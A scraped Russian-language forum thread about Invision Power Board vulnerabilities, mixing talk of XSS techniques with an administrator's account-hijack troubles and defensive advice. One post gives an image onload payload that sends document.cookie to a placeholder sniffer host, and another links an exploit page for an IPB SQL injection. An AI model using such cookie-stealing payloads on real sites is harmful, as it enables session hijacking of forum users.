Перейти к контенту

Уязвимости форумов Invision Power Board


Рекомендуемые сообщения

  • Ответы 1,2k
  • Создана
  • Последний ответ

Лучшие авторы в этой теме

Лучшие авторы в этой теме

Загружено фотографий

ну и что ;)

так это тогда по твоей логике можно в любую запихнуть.

На вон пихай:

%D0%BF%D1%83%D1%82%D1%8C_%D0%BA_%D1%81%D0%BD%D0%B8%D1%84%D1%84%D0%B5%D1%80%D1%83

чего сильно получается? :D

Ссылка на комментарий
Поделиться на других сайтах

Для возможности передачи куков через сниффер нужен ява-скрипт! Поэтому все киддисы пытаются сделать XSS аттаку таким образом, чтобы в html можно провести слово javascript и сделать его одним из аттрибутов любого html тега, чтобы инструкция, записанная в ява-скрипте, исполнилась автоматически при открытии топика (в ИЕ например). Если слово javascript не проведено внутрь страницы, то здесь хоть усрись, ничего не получится.
Ссылка на комментарий
Поделиться на других сайтах

Как показала практика, использование слова javascript не обязательно. Достаточно внедрить картинку, выйти за ее кавычку, а там написать

onload="this.src='снифер'+document.cookie

и усе....

Ссылка на комментарий
Поделиться на других сайтах

ну понятно, там есть несколько способов.

В т.ч. и через <script>

но всё-равно нужно выйти за пределы html тега.

 

Кстати этот пример это что тег? Кинь в личку полный пример.

Ссылка на комментарий
Поделиться на других сайтах

Не знала куда поместить своё сообщение. У кого такое было пожалуйста отзовитесь.

 

Вычислила - каким-то образом пользователь зашёл под моим именем, сменил себе имя с на Это я нашла в админ центре. Там высвечивались последние действия администратора - стояло моё имя и адрес этого пользователя.

 

В админку я зашла под своим старым паролем. Сменила там себе пароль и так смогла зайти в форум. Обнаружила, что сменено моё время. Оно как раз совпадает со временем этого пользователя. Так как могло это произойти?

Ссылка на комментарий
Поделиться на других сайтах

Как показала практика, использование слова javascript не обязательно. Достаточно внедрить картинку, выйти за ее кавычку, а там написать

onload="this.src='снифер'+document.cookie

и усе....

 

Весьма интересно, насколько реальна угроза от подобного куска кода и возможность его внедрения. OnLoad опасная штука.

Ссылка на комментарий
Поделиться на других сайтах

Как показала практика, использование слова javascript не обязательно. Достаточно внедрить картинку, выйти за ее кавычку, а там написать

onload="this.src='снифер'+document.cookie

и усе....

 

Весьма интересно, насколько реальна угроза от подобного куска кода и возможность его внедрения. OnLoad опасная штука.

 

Нет, такой вариант в инвижне давно уже не прокатывает. Дырку в теге IMG закрыли сто лет назад еще в первой линейке кажется (когда кавычка пропускалась в урл картинки). Я просто привела пример того, что по сути не всегда нужно слово "javascript" для выполнения инъекции. Извините, если не в тему.

 

П.С. onload работает только если у юзера включены в браузере картинки и яваскрипт.

Ссылка на комментарий
Поделиться на других сайтах

Что защиты от взлома никакоi нет???Забанила того пользователя.

Вот тебе защита 1 делай пароль как можно из боле цифр и букв

2 Поищи на форуме шел.Может залили его тебе

Ссылка на комментарий
Поделиться на других сайтах

Что защиты от взлома никакоi нет???Забанила того пользователя.

Вот тебе защита 1 делай пароль как можно из боле цифр и букв

2 Поищи на форуме шел.Может залили его тебе

 

 

Опять взяли мой пароль.!!! Меня бомбят. Теперь забанила тот IP.

 

Что такое шел.???

 

Но у меня ярые завистливые противники. С соседнего форума версии 1.3 Final.

Я не знаю кого они на меня натравляют.

 

И каким образом пароль то можно подобрать?

Ссылка на комментарий
Поделиться на других сайтах

Теперь забанила тот IP.

 

Что такое шел.???

 

Но у меня ярые завистливые противники. С соседнего форума версии 1.3 Final.

Я не знаю кого они на меня натравляют.

 

И каким образом пароль то можно подобрать?

айпишка скорее прокси, так что ее бан как мертвому припарка.

пароль можно подобрать, но скорее всего ищи шел.

 

что такое шел трудно так обяснить, если по простому, файлик со скриптом позволяющий просматривать твои файлы на хосте, базу данных, изменять данные.

 

если не представляешь что это такое, то найти трудно.

если на хосте в панеле есть функция антивиря, то прогони ее, может найдет, если нету, то тогда надо ковырять файлы форума.

 

вообще если форум без наворотов, то есть простой вариан против шела, а так же есть еще вариант обезопасится от всего такого.

Ссылка на комментарий
Поделиться на других сайтах

Эта SQL инъекция уже была? Для 2.0.4

 

_http://www.web-hack.ru/exploit/exploit.php?go=169

 

Вроде бы да! Хотя даты там не стоит, но подобное вряд ли осталось бы надолго без внимания.

Ссылка на комментарий
Поделиться на других сайтах

Что защиты от взлома никакоi нет???Забанила того пользователя.

Вот тебе защита 1 делай пароль как можно из боле цифр и букв

2 Поищи на форуме шел.Может залили его тебе

 

 

Опять взяли мой пароль.!!! Меня бомбят. Теперь забанила тот IP.

 

Что такое шел.???

 

Но у меня ярые завистливые противники. С соседнего форума версии 1.3 Final.

Я не знаю кого они на меня натравляют.

 

И каким образом пароль то можно подобрать?

1) Поставь .htaccess на админку.

2) Уменьши длину и поставь более тщательную проверку ( браузер, ИП ) сессий.

Ссылка на комментарий
Поделиться на других сайтах

Уязвимость связанная с вложением тэгов в , , (Описание уязвимости)

Уязвимы форумы: IPB версий 1.х.x и 2.0.х

 

поставила этот патч. у меня версия 2.0.3.

и у меня теперь при добавлении сообщения в расширенной форме исчезли смаслы и кодировки в сообщениях не заменяются на смайлы. что делать, не подскажете?

Ссылка на комментарий
Поделиться на других сайтах

видно патч криво поставила

я все перепроверила. все должно быть верно. если конечно ошибка возникает из-за этого куска кода

Ссылка на комментарий
Поделиться на других сайтах

за последние 3 недели заколебали хакерские атаки. Регулярно, каждый день, на разных форумах на базе IPB 2.1.3 появляются одни и те же сообщения рекламного характера.
Ссылка на комментарий
Поделиться на других сайтах


×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.